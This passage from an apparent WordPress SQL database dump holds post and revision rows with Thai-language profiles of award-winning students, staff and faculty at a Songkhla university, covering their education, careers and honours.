ของมหาวิทยาลัยอีกมากมาย\r\n\r\nรางวัลและผลงานที่ได้รับ\r\n\r\n-  พ.ศ.2550  ได้รับคัดเลือกเป็นนักดนตรี  แสดงคอนเสิร์ต  "สดุดีมหาราชา 80 พรรษา"  แพทยศาสตร์ประสานเสียง (Medical  PSU  Chorus)  มหาวิทยาลัยสงขลานครินทร์\r\n\r\n-  พ.ศ.2552  ได้ร่วมเรียบเรียงเสียงประสานบทเพลงให้กับชมรมดนตรีคณะแพทยศาสตร์  มหาวิทยยาลัยสงขลานครินทร์  เพื่อใช้ในงานแสดงคอนเสิร์ต  A  Charity  Acoustic  Night  for  the  Second  Voice  คืนอันสุข  เพื่อผู้ป่วยไร้กล่องเสียง  มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nพ.ศ.2553  ได้รับคัดเลือกเป็นตัวแทนเยาวชนจาก  5  จังหวัดภาคใต้  ร่วมแสดงคอนเสิร์ต  "วงดุริยางค์เยาวชนเทิดไท้องค์ราชัน"  มหาวิทยาลัยราชภัฏสงขลา  และ  คอนเสิร์ต "กัลป์ยาณิวัฒนาคารวาลัย"  ครั้งที่ 3 ณ  หอประชุมใหญ่ศูนย์วัฒนธรรมแห่งประเทศไทย  ร่่วมกับวงดุริยางค์เยาวชนไทยในพระอุปถัมภ์  สมเด็จพระเจ้าพี่นางเธอ  เจ้าฟ้ากัลยานิวัฒนา  กรมหลวงนราธิวาสราชนครินทร์\r\n\r\nปัจจุบัน\r\n\r\nกำลังอบรมวิชาภาษาอังกฤษ  เพื่อเตรียมศึกษาต่อระดับปริญญาโท', 'นายธีรวุฒ  แก้วมาก', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%98%e0%b8%b5%e0%b8%a3%e0%b8%a7%e0%b8%b8%e0%b8%92-%e0%b9%81%e0%b8%81%e0%b9%89%e0%b8%a7%e0%b8%a1%e0%b8%b2%e0%b8%81', '', '', '2019-05-27 08:30:44', '2019-05-27 01:30:44', '', 0, 'http://172.17.40.11/wp511/?p=532', 0, 'post', '', 0),
(533, 1, '2019-05-27 08:30:44', '2019-05-27 01:30:44', 'นายธีรวุฒ  แก้วมาก\r\n\r\nนักศึกษารางวัลพระราชทาน  ปีการศึกษา  2553\r\n\r\nคนดีศรีราชภัฏ  ประจำปี  2553\r\n\r\n<hr id="system-readmore" />\r\n\r\nการศึกษา\r\n\r\n-  ศิษย์เก่าโรงเรียนหารเทารังสีประชาสรรค์  จังหวัดพัทลุง\r\n\r\n- ระดับอุดมศึกษา  เป็นนักศึกษาโปรแกรมวิชาดนตรี  คณะศิลปกรรมศาสตร์  มหาวิทยาลัยราชภัฏสงขลา  ชั้นปีที่4  ระดับผลการเรียน  3.90\r\n\r\nกิจกรรมที่ร่วมทำขณะกำลังศึกษา\r\n\r\n-  รองหัวหน้านักศึกษาโปรแกรมวิชาดนตรี  ชั้นปีที่ 1 - 4\r\n\r\n-  นักดนตรีลูกทุ่งของวงดนตรีลูกทุ่ง  มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n-  รองประธานชมรมดนตรี\r\n\r\n-  หัวหน้ากิจกรรมน้องพี่ปาริฉัตรสัมพันธ์  คณะศิลปกรรมศาสตร์\r\n\r\n-  วิทยาการสอนน้องร้องเพลง  ในกิจกรรมฝึกน้องร้องเพลง\r\n\r\n-  ผู้ช่วยวิทยากรในโครงการ  "กิจกรรมเข้าค่ายดนตรีออร์เคสตร้า" ของวงออร์เคสตร้าเยาวชนเทศบาลนครยะลา\r\n\r\n-  นายกสโมสรนักศึกษาคณะศิลปกรรมศาสตร์\r\n\r\n-  กรรมการนักศึกษาโปรแกรมวิชาดนตรี\r\n\r\n-  staff  การจัดกิจกรรมด้านดนตรี  ที่จัดขึ้นภายนอกมหาวิทยาลัยราชภัฏสงขลา  อาทิ  คอนเสิร์ตไวโอลินและเปียโน "Carman  Fantasy"  และคอนเสิร์ต  "Wonderful  String  Night"  ที่จัดขึ้น ณ มหาวิทยาลัยสงขลานครินทร์  วิทยาเขตหาดใหญ่\r\n\r\n-  เข้าร่วมกิจกรรมต่างๆ  ของมหาวิทยาลัยอีกมากมาย\r\n\r\nรางวัลและผลงานที่ได้รับ\r\n\r\n-  พ.ศ.2550  ได้รับคัดเลือกเป็นนักดนตรี  แสดงคอนเสิร์ต  "สดุดีมหาราชา 80 พรรษา"  แพทยศาสตร์ประสานเสียง (Medical  PSU  Chorus)  มหาวิทยาลัยสงขลานครินทร์\r\n\r\n-  พ.ศ.2552  ได้ร่วมเรียบเรียงเสียงประสานบทเพลงให้กับชมรมดนตรีคณะแพทยศาสตร์  มหาวิทยยาลัยสงขลานครินทร์  เพื่อใช้ในงานแสดงคอนเสิร์ต  A  Charity  Acoustic  Night  for  the  Second  Voice  คืนอันสุข  เพื่อผู้ป่วยไร้กล่องเสียง  มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nพ.ศ.2553  ได้รับคัดเลือกเป็นตัวแทนเยาวชนจาก  5  จังหวัดภาคใต้  ร่วมแสดงคอนเสิร์ต  "วงดุริยางค์เยาวชนเทิดไท้องค์ราชัน"  มหาวิทยาลัยราชภัฏสงขลา  และ  คอนเสิร์ต "กัลป์ยาณิวัฒนาคารวาลัย"  ครั้งที่ 3 ณ  หอประชุมใหญ่ศูนย์วัฒนธรรมแห่งประเทศไทย  ร่่วมกับวงดุริยางค์เยาวชนไทยในพระอุปถัมภ์  สมเด็จพระเจ้าพี่นางเธอ  เจ้าฟ้ากัลยานิวัฒนา  กรมหลวงนราธิวาสราชนครินทร์\r\n\r\nปัจจุบัน\r\n\r\nกำลังอบรมวิชาภาษาอังกฤษ  เพื่อเตรียมศึกษาต่อระดับปริญญาโท', 'นายธีรวุฒ  แก้วมาก', '', 'inherit', 'closed', 'closed', '', '532-revision-v1', '', '', '2019-05-27 08:30:44', '2019-05-27 01:30:44', '', 532, 'http://172.17.40.11/wp511/?p=533', 0, 'revision', '', 0),
(534, 1, '2019-05-27 08:31:05', '2019-05-27 01:31:05', 'นางสาวอุไรวรรณ  รัตนพงศ์\r\n\r\nข้าราชการพลเรือนดีเด่น ประจำปี 2553\r\n\r\nคนดีศรีราชภัฏ ประจำปี 2554\r\n\r\nกำเนิด\r\n\r\nนางสาวอุไรวรรณ  รัตนพงศ์  เกิดเมื่อวันที่ 27 พฤศจิกายน 2494 ณ ตำบลเขารูปช้าง อำเภอเมือง จังหวัดสงขลา\r\n\r\n<hr id="system-readmore" />\r\n\r\nการศึกษา\r\n\r\nพ.ศ.2505  จบการศึกษาระดับประถมศึกษา (ป.4) จากโรงเรียนวัดเขาแก้ว\r\n\r\nพ.ศ.2508  จบการศึกษาระดับประถมศึกษา (ป.7) จากโรงเรียนบ้านน้ำกระจาย\r\n\r\nพ.ศ.2514  จบการศึกษาระดับมัธยมศึกษาตอนต้น (มศ.3) จากโรงเรียนแจ้งวิทยา\r\n\r\nพ.ศ.2528  จบการศึกษาระดับประกาศนียบัตรวิชาการศึกษาชั้นสูง (ป.กศ.สูง) จากวิทยาลัยครูสงขลา\r\n\r\nการทำงาน\r\n\r\n1 มิถุนายน 2517  ลูกจ้างชั่วคราว  วิทยาลัยครูสงขลา\r\n\r\n1 มิถุนายน 2524  ลูกจ้างประจำ  วิทยาลัยครูสงขลา\r\n\r\n14 กุมภาพันธ์ 2541  พนักงานพิมพ์ดีดชั้น 1  สถาบันราชภัฏสงขลา\r\n\r\n15 มิถุนายน 2544  พนักงานพิมพ์ดีดชั้น 2  สถาบันราชภัฏสงขลา\r\n\r\n1 ตุลาคม 2546  พนักงานพิมพ์ดีดชั้น 3  สถาบันราชภัฏสงขลา\r\n\r\n15 มิถุนายน 2547  พนักงานพิมพ์ดีด ชั้น 3  มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n1 ตุลาคม 2555  เกษียณอายุราชการ\r\n\r\nประกาศเกียรติคุณ\r\n\r\n-  รับโล่ / ประกาศเกียรติคุณ  ข้าราชการพลเรือนดีเด่น ประจำปี 2553\r\n\r\n-  รับโล่ / ประกาศเกียรติคุณ คนดีศรีราชภัฏ ประจำปี 2554\r\n\r\nหารปฏิบัติงาน\r\n\r\nพ.ศ.2517 - 2523  งานพิมพ์บัตรรายการ ลงทะเบียน งานบริการยืม - คืน และงานวารสาร\r\n\r\nพ.ศ.2524 - 2551  เลขานุการของสำนักวิทยบริการ\r\n\r\nพ.ศ.2524 - ปัจจุบัน  งานพัสดุการเงิน งานธุรการ\r\n\r\nงานหลังเกษียณ\r\n\r\n-  ดูแลพ่อและแม่อายุ 89 และ 85 ปี\r\n\r\n-  ปลูกไม้ดอกไม้ประดับ\r\n\r\n-  ออกกำลังกายทุกวัน ตอนเช้า เวลา 05.00 - 05.30 น.', 'นางสาวอุไรวรรณ  รัตนพงศ์', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%b2%e0%b8%a7%e0%b8%ad%e0%b8%b8%e0%b9%84%e0%b8%a3%e0%b8%a7%e0%b8%a3%e0%b8%a3%e0%b8%93-%e0%b8%a3%e0%b8%b1%e0%b8%95%e0%b8%99%e0%b8%9e%e0%b8%87%e0%b8%a8', '', '', '2019-05-27 08:31:05', '2019-05-27 01:31:05', '', 0, 'http://172.17.40.11/wp511/?p=534', 0, 'post', '', 0),
(535, 1, '2019-05-27 08:31:05', '2019-05-27 01:31:05', 'นางสาวอุไรวรรณ  รัตนพงศ์\r\n\r\nข้าราชการพลเรือนดีเด่น ประจำปี 2553\r\n\r\nคนดีศรีราชภัฏ ประจำปี 2554\r\n\r\nกำเนิด\r\n\r\nนางสาวอุไรวรรณ  รัตนพงศ์  เกิดเมื่อวันที่ 27 พฤศจิกายน 2494 ณ ตำบลเขารูปช้าง อำเภอเมือง จังหวัดสงขลา\r\n\r\n<hr id="system-readmore" />\r\n\r\nการศึกษา\r\n\r\nพ.ศ.2505  จบการศึกษาระดับประถมศึกษา (ป.4) จากโรงเรียนวัดเขาแก้ว\r\n\r\nพ.ศ.2508  จบการศึกษาระดับประถมศึกษา (ป.7) จากโรงเรียนบ้านน้ำกระจาย\r\n\r\nพ.ศ.2514  จบการศึกษาระดับมัธยมศึกษาตอนต้น (มศ.3) จากโรงเรียนแจ้งวิทยา\r\n\r\nพ.ศ.2528  จบการศึกษาระดับประกาศนียบัตรวิชาการศึกษาชั้นสูง (ป.กศ.สูง) จากวิทยาลัยครูสงขลา\r\n\r\nการทำงาน\r\n\r\n1 มิถุนายน 2517  ลูกจ้างชั่วคราว  วิทยาลัยครูสงขลา\r\n\r\n1 มิถุนายน 2524  ลูกจ้างประจำ  วิทยาลัยครูสงขลา\r\n\r\n14 กุมภาพันธ์ 2541  พนักงานพิมพ์ดีดชั้น 1  สถาบันราชภัฏสงขลา\r\n\r\n15 มิถุนายน 2544  พนักงานพิมพ์ดีดชั้น 2  สถาบันราชภัฏสงขลา\r\n\r\n1 ตุลาคม 2546  พนักงานพิมพ์ดีดชั้น 3  สถาบันราชภัฏสงขลา\r\n\r\n15 มิถุนายน 2547  พนักงานพิมพ์ดีด ชั้น 3  มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n1 ตุลาคม 2555  เกษียณอายุราชการ\r\n\r\nประกาศเกียรติคุณ\r\n\r\n-  รับโล่ / ประกาศเกียรติคุณ  ข้าราชการพลเรือนดีเด่น ประจำปี 2553\r\n\r\n-  รับโล่ / ประกาศเกียรติคุณ คนดีศรีราชภัฏ ประจำปี 2554\r\n\r\nหารปฏิบัติงาน\r\n\r\nพ.ศ.2517 - 2523  งานพิมพ์บัตรรายการ ลงทะเบียน งานบริการยืม - คืน และงานวารสาร\r\n\r\nพ.ศ.2524 - 2551  เลขานุการของสำนักวิทยบริการ\r\n\r\nพ.ศ.2524 - ปัจจุบัน  งานพัสดุการเงิน งานธุรการ\r\n\r\nงานหลังเกษียณ\r\n\r\n-  ดูแลพ่อและแม่อายุ 89 และ 85 ปี\r\n\r\n-  ปลูกไม้ดอกไม้ประดับ\r\n\r\n-  ออกกำลังกายทุกวัน ตอนเช้า เวลา 05.00 - 05.30 น.', 'นางสาวอุไรวรรณ  รัตนพงศ์', '', 'inherit', 'closed', 'closed', '', '534-revision-v1', '', '', '2019-05-27 08:31:05', '2019-05-27 01:31:05', '', 534, 'http://172.17.40.11/wp511/?p=535', 0, 'revision', '', 0),
(536, 1, '2019-05-27 08:31:22', '2019-05-27 01:31:22', 'นางสุพิศ  ศิริรัตน์\r\n\r\nข้าราชการพลเรือนดีเด่น ประจำปี 2549\r\n\r\nคนดีศรีสงขลา ประจำปี 2549\r\n\r\nกำเนิด\r\n\r\nนางสุพิศ  ศิริรัตน์  เกิดเมื่อวันที่ 29 มิถุนายน 2506  ณ อำเภอระโนด  จังหวัดสงขลา\r\n\r\n<hr id="system-readmore" />\r\n\r\n<b>ประวัติการศึกษา</b>\r\n2530  ปริญญาตรี บรรณารักษศาสตร์ มหาวิทยาลัยรามคำแหง\r\n2549 - ปัจจุบัน  กำลังศึกษาปริญญาโท สารสนเทศศาสตร์ มหาวิทยาลัยสุโขทัยธรรมาธิราช\r\n\r\n<b>ประวัติการทำงาน</b>\r\n2545 – 2548 รองผู้อำนวยการศูนย์วิทยบริการ ฝ่ายประกันคุณภาพ สำนักวิทยบริการและเทคโนโลยีสารสนเทศ มหาวิทยาลัยราชภัฏสงขลา\r\n2548 - 2552 หัวหน้ากลุ่มงานเทคนิค สำนักวิทยบริการและเทคโนโลยีสารสนเทศ มหาวิทยาลัยราชภัฏสงขลา\r\n2552 - ปัจจุบัน รองผู้อำนวยการงานวิทยบริการ สังกัดสำนักวิทยบริการและเทคโนโลยีสารสนเทศ  มหาวิทยาลัยราชภัฏสงขลา และเจ้ากน้าที่บริหารงานทั่วไปชำนาญการ\r\n\r\n<b>รางวัลที่ได้รับ</b>\r\n2549  รางวัลข้าราชการพลเรือนดีเด่น ของสำนักงานคณะกรรมการข้าราชการพลเรือน(ก.พ.)\r\n2549  รางวัลคนดี ศรีสงขลา ของมูลนิธิรักสงขลา เฉลิมพระเกียรติ', 'นางสุพิศ  ศิริรัตน์', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%b8%e0%b8%9e%e0%b8%b4%e0%b8%a8-%e0%b8%a8%e0%b8%b4%e0%b8%a3%e0%b8%b4%e0%b8%a3%e0%b8%b1%e0%b8%95%e0%b8%99%e0%b9%8c', '', '', '2019-05-27 08:31:22', '2019-05-27 01:31:22', '', 0, 'http://172.17.40.11/wp511/?p=536', 0, 'post', '', 0),
(537, 1, '2019-05-27 08:31:22', '2019-05-27 01:31:22', 'นางสุพิศ  ศิริรัตน์\r\n\r\nข้าราชการพลเรือนดีเด่น ประจำปี 2549\r\n\r\nคนดีศรีสงขลา ประจำปี 2549\r\n\r\nกำเนิด\r\n\r\nนางสุพิศ  ศิริรัตน์  เกิดเมื่อวันที่ 29 มิถุนายน 2506  ณ อำเภอระโนด  จังหวัดสงขลา\r\n\r\n<hr id="system-readmore" />\r\n\r\n<b>ประวัติการศึกษา</b>\r\n2530  ปริญญาตรี บรรณารักษศาสตร์ มหาวิทยาลัยรามคำแหง\r\n2549 - ปัจจุบัน  กำลังศึกษาปริญญาโท สารสนเทศศาสตร์ มหาวิทยาลัยสุโขทัยธรรมาธิราช\r\n\r\n<b>ประวัติการทำงาน</b>\r\n2545 – 2548 รองผู้อำนวยการศูนย์วิทยบริการ ฝ่ายประกันคุณภาพ สำนักวิทยบริการและเทคโนโลยีสารสนเทศ มหาวิทยาลัยราชภัฏสงขลา\r\n2548 - 2552 หัวหน้ากลุ่มงานเทคนิค สำนักวิทยบริการและเทคโนโลยีสารสนเทศ มหาวิทยาลัยราชภัฏสงขลา\r\n2552 - ปัจจุบัน รองผู้อำนวยการงานวิทยบริการ สังกัดสำนักวิทยบริการและเทคโนโลยีสารสนเทศ  มหาวิทยาลัยราชภัฏสงขลา และเจ้ากน้าที่บริหารงานทั่วไปชำนาญการ\r\n\r\n<b>รางวัลที่ได้รับ</b>\r\n2549  รางวัลข้าราชการพลเรือนดีเด่น ของสำนักงานคณะกรรมการข้าราชการพลเรือน(ก.พ.)\r\n2549  รางวัลคนดี ศรีสงขลา ของมูลนิธิรักสงขลา เฉลิมพระเกียรติ', 'นางสุพิศ  ศิริรัตน์', '', 'inherit', 'closed', 'closed', '', '536-revision-v1', '', '', '2019-05-27 08:31:22', '2019-05-27 01:31:22', '', 536, 'http://172.17.40.11/wp511/?p=537', 0, 'revision', '', 0),
(538, 1, '2019-05-27 08:31:41', '2019-05-27 01:31:41', 'นายธงศักดิ์  หงษ์แพง\r\n\r\nข้าราชการพลเรือนดีเด่น  ประจำปี 2552\r\n\r\n<hr id="system-readmore" />\r\n\r\n<div class="boxLabel">เกิด :19 กุมภาพันธ์ 2493</div>\r\n<div class="boxLabel">การศึกษา :</div>\r\n<div class="boxData">- ศิลปบัณฑิต (ประติมากรรม) เกียรตินิยมอันดับ 2 มหาวิทยาลัยศิลปากร</div>\r\n<div class="boxData">- ศิลปมหาบัณฑิต มหาวิทยาลัยศิลปากร</div>\r\n<div class="boxLabel">นิทรรศการกลุ่ม :</div>\r\n<div class="boxData">- การแสดงงานประติมากรรมของกลุ่มประติมากรรมไทย ครั้งที่ 1-2</div>\r\n<div class="boxData">- การแสดงงานประติมากรรมของสมาคมประติมากรไทย ครั้งที่ 1</div>\r\n<div class="boxData">2519 - การแสดงศิลปกรรมแห่งชาติ ครั้งที่ 23</div>\r\n<div class="boxData">2528 - การแสดงศิลปกรรมแห่งชาติ ครั้งที่ 31</div>\r\n<div class="boxData">- นิทรรศการครบรอบ หอศิลป พีระศรี ครั้งที่ 1</div>\r\n<div class="boxData">- นิทรรศการอาจารย์คณะวิจิตรศิลป์ มหาวิทยาลัยเชียงใหม่ หอศิลปแห่งชาติ กรุงเทพฯ</div>\r\n<div class="boxLabel">รางวัล/เกียรติยศ :</div>\r\n<div class="boxData">- รางวัลที่ 3 จากการประกวดประติมากรรมเพื่อติดตั้งหน้าตึกธนาคารศรีนคร</div>', 'นายธงศักดิ์  หงษ์แพง', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%98%e0%b8%87%e0%b8%a8%e0%b8%b1%e0%b8%81%e0%b8%94%e0%b8%b4%e0%b9%8c-%e0%b8%ab%e0%b8%87%e0%b8%a9%e0%b9%8c%e0%b9%81%e0%b8%9e%e0%b8%87', '', '', '2019-05-27 08:31:41', '2019-05-27 01:31:41', '', 0, 'http://172.17.40.11/wp511/?p=538', 0, 'post', '', 0),
(539, 1, '2019-05-27 08:31:41', '2019-05-27 01:31:41', 'นายธงศักดิ์  หงษ์แพง\r\n\r\nข้าราชการพลเรือนดีเด่น  ประจำปี 2552\r\n\r\n<hr id="system-readmore" />\r\n\r\n<div class="boxLabel">เกิด :19 กุมภาพันธ์ 2493</div>\r\n<div class="boxLabel">การศึกษา :</div>\r\n<div class="boxData">- ศิลปบัณฑิต (ประติมากรรม) เกียรตินิยมอันดับ 2 มหาวิทยาลัยศิลปากร</div>\r\n<div class="boxData">- ศิลปมหาบัณฑิต มหาวิทยาลัยศิลปากร</div>\r\n<div class="boxLabel">นิทรรศการกลุ่ม :</div>\r\n<div class="boxData">- การแสดงงานประติมากรรมของกลุ่มประติมากรรมไทย ครั้งที่ 1-2</div>\r\n<div class="boxData">- การแสดงงานประติมากรรมของสมาคมประติมากรไทย ครั้งที่ 1</div>\r\n<div class="boxData">2519 - การแสดงศิลปกรรมแห่งชาติ ครั้งที่ 23</div>\r\n<div class="boxData">2528 - การแสดงศิลปกรรมแห่งชาติ ครั้งที่ 31</div>\r\n<div class="boxData">- นิทรรศการครบรอบ หอศิลป พีระศรี ครั้งที่ 1</div>\r\n<div class="boxData">- นิทรรศการอาจารย์คณะวิจิตรศิลป์ มหาวิทยาลัยเชียงใหม่ หอศิลปแห่งชาติ กรุงเทพฯ</div>\r\n<div class="boxLabel">รางวัล/เกียรติยศ :</div>\r\n<div class="boxData">- รางวัลที่ 3 จากการประกวดประติมากรรมเพื่อติดตั้งหน้าตึกธนาคารศรีนคร</div>', 'นายธงศักดิ์  หงษ์แพง', '', 'inherit', 'closed', 'closed', '', '538-revision-v1', '', '', '2019-05-27 08:31:41', '2019-05-27 01:31:41', '', 538, 'http://172.17.40.11/wp511/?p=539', 0, 'revision', '', 0),
(540, 1, '2019-05-27 08:31:56', '2019-05-27 01:31:56', 'นายปริญญา  ศรีวรรณ\r\n\r\nนักศึกษารางวัลพระราทาน  ประจำปี 2554', 'นายปริญญา  ศรีวรรณ', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b4%e0%b8%8d%e0%b8%8d%e0%b8%b2-%e0%b8%a8%e0%b8%a3%e0%b8%b5%e0%b8%a7%e0%b8%a3%e0%b8%a3%e0%b8%93', '', '', '2019-05-27 08:31:56', '2019-05-27 01:31:56', '', 0, 'http://172.17.40.11/wp511/?p=540', 0, 'post', '', 0),
(541, 1, '2019-05-27 08:31:56', '2019-05-27 01:31:56', 'นายปริญญา  ศรีวรรณ\r\n\r\nนักศึกษารางวัลพระราทาน  ประจำปี 2554', 'นายปริญญา  ศรีวรรณ', '', 'inherit', 'closed', 'closed', '', '540-revision-v1', '', '', '2019-05-27 08:31:56', '2019-05-27 01:31:56', '', 540, 'http://172.17.40.11/wp511/?p=541', 0, 'revision', '', 0),
(542, 1, '2019-05-27 08:32:13', '2019-05-27 01:32:13', 'นายสุรเดช  สุริยวานิช\r\n\r\nนักศึกษารางวัลพระราชทาน\r\n\r\nประจำปี 2555\r\n\r\n(ประเภทคนพิการ)', 'นายสุรเดช  สุริยวานิช', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%aa%e0%b8%b8%e0%b8%a3%e0%b9%80%e0%b8%94%e0%b8%8a-%e0%b8%aa%e0%b8%b8%e0%b8%a3%e0%b8%b4%e0%b8%a2%e0%b8%a7%e0%b8%b2%e0%b8%99%e0%b8%b4%e0%b8%8a', '', '', '2019-05-27 08:33:16', '2019-05-27 01:33:16', '', 0, 'http://172.17.40.11/wp511/?p=542', 0, 'post', '', 0),
(543, 1, '2019-05-27 08:32:13', '2019-05-27 01:32:13', 'นายสุรเดช  สุริยวานิช\r\n\r\nนักศึกษารางวัลพระราชทาน\r\n\r\n<hr id="system-readmore" />\r\n\r\nประจำปี 2555\r\n\r\n(ประเภทคนพิการ)', 'นายสุรเดช  สุริยวานิช', '', 'inherit', 'closed', 'closed', '', '542-revision-v1', '', '', '2019-05-27 08:32:13', '2019-05-27 01:32:13', '', 542, 'http://172.17.40.11/wp511/?p=543', 0, 'revision', '', 0),
(544, 1, '2019-05-27 08:32:28', '2019-05-27 01:32:28', 'นายอภิสิทธิ์  แสงวิสุทธิ์\r\n\r\nนักศึกษาโปรแกรมวิชาวิทยาศาสตร์สุขภาพ\r\n\r\nได้รับรางวัลเพชรน้ำงาม  แห่งความภาคภูมิใจ\r\n\r\nประจำปี 2556', 'นายอภิสิทธิ์  แสงวิสุทธิ์', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%ad%e0%b8%a0%e0%b8%b4%e0%b8%aa%e0%b8%b4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c-%e0%b9%81%e0%b8%aa%e0%b8%87%e0%b8%a7%e0%b8%b4%e0%b8%aa%e0%b8%b8%e0%b8%97%e0%b8%98', '', '', '2019-05-27 08:33:07', '2019-05-27 01:33:07', '', 0, 'http://172.17.40.11/wp511/?p=544', 0, 'post', '', 0),
(545, 1, '2019-05-27 08:32:28', '2019-05-27 01:32:28', 'นายอภิสิทธิ์  แสงวิสุทธิ์\r\n\r\nนักศึกษาโปรแกรมวิชาวิทยาศาสตร์สุขภาพ\r\n\r\nได้รับรางวัลเพชรน้ำงาม  แห่งความภาคภูมิใจ\r\n\r\n<hr id="system-readmore" />\r\n\r\nประจำปี 2556', 'นายอภิสิทธิ์  แสงวิสุทธิ์', '', 'inherit', 'closed', 'closed', '', '544-revision-v1', '', '', '2019-05-27 08:32:28', '2019-05-27 01:32:28', '', 544, 'http://172.17.40.11/wp511/?p=545', 0, 'revision', '', 0),
(546, 1, '2019-05-27 08:32:43', '2019-05-27 01:32:43', 'ผู้ช่วยศาสตราจารย์ ดร.ศศลักษณ์  ทองขาว\r\n\r\nอาจารย์ประจำโปรแกรมวิชาคอมพิวเตอร์\r\n\r\nได้รับรางวัลเพชรน้ำเอก  ผู้เสกสรรปัญญาชน\r\n\r\nประจำปี 2556', 'ผู้ช่วยศาสตราจารย์ ดร.ศศลักษณ์  ทองขาว', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c-%e0%b8%94%e0%b8%a3-%e0%b8%a8%e0%b8%a8', '', '', '2019-05-27 08:32:56', '2019-05-27 01:32:56', '', 0, 'http://172.17.40.11/wp511/?p=546', 0, 'post', '', 0),
(547, 1, '2019-05-27 08:32:43', '2019-05-27 01:32:43', 'ผู้ช่วยศาสตราจารย์ ดร.ศศลักษณ์  ทองขาว\r\n\r\nอาจารย์ประจำโปรแกรมวิชาคอมพิวเตอร์\r\n\r\nได้รับรางวัลเพชรน้ำเอก  ผู้เสกสรรปัญญาชน\r\n\r\n<hr id="system-readmore" />\r\n\r\nประจำปี 2556', 'ผู้ช่วยศาสตราจารย์ ดร.ศศลักษณ์  ทองขาว', '', 'inherit', 'closed', 'closed', '', '546-revision-v1', '', '', '2019-05-27 08:32:43', '2019-05-27 01:32:43', '', 546, 'http://172.17.40.11/wp511/?p=547', 0, 'revision', '', 0),
(548, 1, '2019-05-27 08:32:56', '2019-05-27 01:32:56', 'ผู้ช่วยศาสตราจารย์ ดร.ศศลักษณ์  ทองขาว\r\n\r\nอาจารย์ประจำโปรแกรมวิชาคอมพิวเตอร์\r\n\r\nได้รับรางวัลเพชรน้ำเอก  ผู้เสกสรรปัญญาชน\r\n\r\nประจำปี 2556', 'ผู้ช่วยศาสตราจารย์ ดร.ศศลักษณ์  ทองขาว', '', 'inherit', 'closed', 'closed', '', '546-revision-v1', '', '', '2019-05-27 08:32:56', '2019-05-27 01:32:56', '', 546, 'http://172.17.40.11/wp511/?p=548', 0, 'revision', '', 0),
(549, 1, '2019-05-27 08:33:07', '2019-05-27 01:33:07', 'นายอภิสิทธิ์  แสงวิสุทธิ์\r\n\r\nนักศึกษาโปรแกรมวิชาวิทยาศาสตร์สุขภาพ\r\n\r\nได้รับรางวัลเพชรน้ำงาม  แห่งความภาคภูมิใจ\r\n\r\nประจำปี 2556', 'นายอภิสิทธิ์  แสงวิสุทธิ์', '', 'inherit', 'closed', 'closed', '', '544-revision-v1', '', '', '2019-05-27 08:33:07', '2019-05-27 01:33:07', '', 544, 'http://172.17.40.11/wp511/?p=549', 0, 'revision', '', 0),
(550, 1, '2019-05-27 08:33:16', '2019-05-27 01:33:16', 'นายสุรเดช  สุริยวานิช\r\n\r\nนักศึกษารางวัลพระราชทาน\r\n\r\nประจำปี 2555\r\n\r\n(ประเภทคนพิการ)', 'นายสุรเดช  สุริยวานิช', '', 'inherit', 'closed', 'closed', '', '542-revision-v1', '', '', '2019-05-27 08:33:16', '2019-05-27 01:33:16', '', 542, 'http://172.17.40.11/wp511/?p=550', 0, 'revision', '', 0),
(551, 1, '2019-05-27 08:40:43', '2019-05-27 01:40:43', 'ร.อ.อ.หลวงสุวรรณวาจกกสิกิจ (สุวรรณ เรศานนท์)\r\n\r\nดำรงตำแหน่ง วันที่ 17 พฤษภาคม 2476 - 31 มีนาคม 2477', 'ร.อ.อ.หลวงสุวรรณวาจกกสิกิจ (สุวรรณ เรศานนท์)', '', 'publish', 'closed', 'open', '', '%e0%b8%a3-%e0%b8%ad-%e0%b8%ad-%e0%b8%ab%e0%b8%a5%e0%b8%a7%e0%b8%87%e0%b8%aa%e0%b8%b8%e0%b8%a7%e0%b8%a3%e0%b8%a3%e0%b8%93%e0%b8%a7%e0%b8%b2%e0%b8%88%e0%b8%81%e0%b8%81%e0%b8%aa%e0%b8%b4%e0%b8%81', '', '', '2019-05-27 08:40:43', '2019-05-27 01:40:43', '', 0, 'http://172.17.40.11/wp511/?p=551', 0, 'post', '', 0),
(552, 1, '2019-05-27 08:40:43', '2019-05-27 01:40:43', 'ร.อ.อ.หลวงสุวรรณวาจกกสิกิจ (สุวรรณ เรศานนท์)\r\n\r\nดำรงตำแหน่ง วันที่ 17 พฤษภาคม 2476 - 31 มีนาคม 2477', 'ร.อ.อ.หลวงสุวรรณวาจกกสิกิจ (สุวรรณ เรศานนท์)', '', 'inherit', 'closed', 'closed', '', '551-revision-v1', '', '', '2019-05-27 08:40:43', '2019-05-27 01:40:43', '', 551, 'http://172.17.40.11/wp511/?p=552', 0, 'revision', '', 0),
